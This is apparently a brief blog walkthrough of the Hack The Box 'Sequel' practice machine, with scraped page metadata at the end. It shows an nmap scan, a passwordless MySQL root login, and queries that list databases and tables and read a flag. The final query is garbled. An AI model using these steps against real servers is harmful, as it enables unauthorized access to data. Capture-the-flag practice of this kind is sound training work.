Sequel machine [HTB]
Sequel
Wiki topics:
🔒 · Cybersecurity
Sequel machine [HTB]

- Start port scan with nmap

We get the 3306 port with mysql service running
- Login in database only with root user with the next cmd :
mysql -h {IP} -u root
- Show database avaliables

SHOW DATABASES;
Select database

USE htb;
- In htb you could find the flag .

SHOW TABLES:

SELECT FROM config;*
메타데이터
- post_id
- 3a10cd62c3c0
- slug
- sequel-machine-htb-3a10cd62c3c0
- url
- https://medium.com/@cortesseven2003/sequel-machine-htb-3a10cd62c3c0
- canonical_url
- https://medium.com/@cortesseven2003/sequel-machine-htb-3a10cd62c3c0
- author_url
- https://medium.com/@cortesseven2003
- status
- ok
- fetched_at
- 2026-06-29 22:44:20